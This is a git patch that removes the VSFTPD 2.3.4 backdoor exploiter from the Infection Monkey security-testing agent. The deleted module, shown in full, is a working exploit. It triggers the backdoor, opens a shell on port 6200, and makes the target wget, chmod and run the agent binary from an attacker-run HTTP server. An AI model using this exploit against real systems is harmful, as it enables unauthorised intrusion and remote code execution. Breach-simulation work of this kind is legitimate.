From 40b9b5b730b4db5d67af9a2f854c90a374e33ed1 Mon Sep 17 00:00:00 2001
From: Shreya Malviya <shreya.malviya@gmail.com>
Date: Fri, 29 Oct 2021 17:57:12 +0530
Subject: [PATCH] Agent: Remove VSFTPD exploiter

---
 monkey/infection_monkey/example.conf      |   1 -
 monkey/infection_monkey/exploit/vsftpd.py | 166 ----------------------
 2 files changed, 167 deletions(-)
 delete mode 100644 monkey/infection_monkey/exploit/vsftpd.py

diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf
index e5ce947c9..d9acee9ed 100644
--- a/monkey/infection_monkey/example.conf
+++ b/monkey/infection_monkey/example.conf
@@ -39,7 +39,6 @@
     "Struts2Exploiter",
     "WebLogicExploiter",
     "HadoopExploiter",
-    "VSFTPDExploiter",
     "MSSQLExploiter"
   ],
   "finger_classes": [
diff --git a/monkey/infection_monkey/exploit/vsftpd.py b/monkey/infection_monkey/exploit/vsftpd.py
deleted file mode 100644
index 42c7c052f..000000000
--- a/monkey/infection_monkey/exploit/vsftpd.py
+++ /dev/null
@@ -1,166 +0,0 @@
-"""
-    Implementation is based on VSFTPD v2.3.4 Backdoor Command Execution exploit by metasploit
-    https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp
-    /vsftpd_234_backdoor.rb
-    only vulnerable version is "2.3.4"
-"""
-
-import socket
-import time
-from logging import getLogger
-
-from common.utils.attack_utils import ScanStatus
-from infection_monkey.exploit.HostExploiter import HostExploiter
-from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
-from infection_monkey.exploit.tools.http_tools import HTTPTools
-from infection_monkey.model import (
-    CHMOD_MONKEY,
-    DOWNLOAD_TIMEOUT,
-    MONKEY_ARG,
-    RUN_MONKEY,
-    WGET_HTTP_UPLOAD,
-)
-from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
-from infection_monkey.utils.commands import build_monkey_commandline
-
-logger = getLogger(__name__)
-
-
-FTP_PORT = 21  # port at which vsftpd runs
-BACKDOOR_PORT = 6200  # backdoor port
-RECV_128 = 128  # In Bytes
-UNAME_M = "uname -m"
-ULIMIT_V = "ulimit -v "  # To increase the memory limit
-UNLIMITED = "unlimited;"
-USERNAME = b"USER D3fa1t:)"  # Ftp Username should end with :) to trigger the backdoor
-PASSWORD = b"PASS please"  # Ftp Password
-FTP_TIME_BUFFER = 1  # In seconds
-
-
-class VSFTPDExploiter(HostExploiter):
-    _TARGET_OS_TYPE = ["linux"]
-    _EXPLOITED_SERVICE = "VSFTPD"
-
-    def __init__(self, host):
-        self._update_timestamp = 0
-        super(VSFTPDExploiter, self).__init__(host)
-        self.skip_exist = self._config.skip_exploit_if_file_exist
-
-    def socket_connect(self, s, ip_addr, port):
-        try:
-            s.connect((ip_addr, port))
-            return True
-        except socket.error as e:
-            logger.info("Failed to connect to %s: %s", self.host.ip_addr, str(e))
-        return False
-
-    def socket_send_recv(self, s, message):
-        try:
-            s.send(message)
-            return s.recv(RECV_128).decode("utf-8")
-        except socket.error as e:
-            logger.info("Failed to send payload to %s: %s", self.host.ip_addr, str(e))
-        return False
-
-    def socket_send(self, s, message):
-        try:
-            s.send(message)
-            return True
-        except socket.error as e:
-            logger.info("Failed to send payload to %s: %s", self.host.ip_addr, str(e))
-        return False
-
-    def _exploit_host(self):
-        logger.info("Attempting to trigger the Backdoor..")
-        ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-
-        if self.socket_connect(ftp_socket, self.host.ip_addr, FTP_PORT):
-            ftp_socket.recv(RECV_128).decode("utf-8")
-
-        if self.socket_send_recv(ftp_socket, USERNAME + b"\n"):
-            time.sleep(FTP_TIME_BUFFER)
-            self.socket_send(ftp_socket, PASSWORD + b"\n")
-            ftp_socket.close()
-            logger.info("Backdoor Enabled, Now we can run commands")
-        else:
-            logger.error("Failed to trigger backdoor on %s", self.host.ip_addr)
-            return False
-
-        logger.info("Attempting to connect to backdoor...")
-        backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-
-        if self.socket_connect(backdoor_socket, self.host.ip_addr, BACKDOOR_PORT):
-            logger.info("Connected to backdoor on %s:6200", self.host.ip_addr)
-
-        uname_m = str.encode(UNAME_M + "\n")
-        response = self.socket_send_recv(backdoor_socket, uname_m)
-
-        if response:
-            logger.info("Response for uname -m: %s", response)
-            if "" != response.lower().strip():
-                # command execution is successful
-                self.host.os["machine"] = response.lower().strip()
-                self.host.os["type"] = "linux"
-        else:
-            logger.info("Failed to execute command uname -m on victim %r ", self.host)
-
-        src_path = get_target_monkey(self.host)
-        logger.info("src for suitable monkey executable for host %r is %s", self.host, src_path)
-
-        if not src_path:
-            logger.info("Can't find suitable monkey executable for host %r", self.host)
-            return False
-
-        # Create a http server to host the monkey
-        http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
-        dropper_target_path_linux = self._config.dropper_target_path_linux
-        logger.info("Download link for monkey is %s", http_path)
-
-        # Upload the monkey to the machine
-        monkey_path = dropper_target_path_linux
-        download_command = WGET_HTTP_UPLOAD % {"monkey_path": monkey_path, "http_path": http_path}
-        download_command = str.encode(str(download_command) + "\n")
-        logger.info("Download command is %s", download_command)
-        if self.socket_send(backdoor_socket, download_command):
-            logger.info("Monkey is now Downloaded ")
-        else:
-            logger.error("Failed to download monkey at %s", self.host.ip_addr)
-            return False
-
-        http_thread.join(DOWNLOAD_TIMEOUT)
-        http_thread.stop()
-
-        # Change permissions
-        change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path}
-        change_permission = str.encode(str(change_permission) + "\n")
-        logger.info("change_permission command is %s", change_permission)
-        backdoor_socket.send(change_permission)
-        T1222Telem(ScanStatus.USED, change_permission.decode(), self.host).send()
-
-        # Run monkey on the machine
-        parameters = build_monkey_commandline(
-            self.host, get_monkey_depth() - 1, vulnerable_port=FTP_PORT
-        )
-        run_monkey = RUN_MONKEY % {
-            "monkey_path": monkey_path,
-            "monkey_type": MONKEY_ARG,
-            "parameters": parameters,
-        }
-
-        # Set unlimited to memory
-        # we don't have to revert the ulimit because it just applies to the shell obtained by our
-        # exploit
-        run_monkey = ULIMIT_V + UNLIMITED + " " + run_monkey
-        run_monkey = str.encode(str(run_monkey) + "\n")
-        time.sleep(FTP_TIME_BUFFER)
-        if backdoor_socket.send(run_monkey):
-            logger.info(
-                "Executed monkey '%s' on remote victim %r (cmdline=%r)",
-                self._config.dropper_target_path_linux,
-                self.host,
-                run_monkey,
-            )
-            self.add_executed_cmd(run_monkey.decode())
-            return True
-        else:
-            return False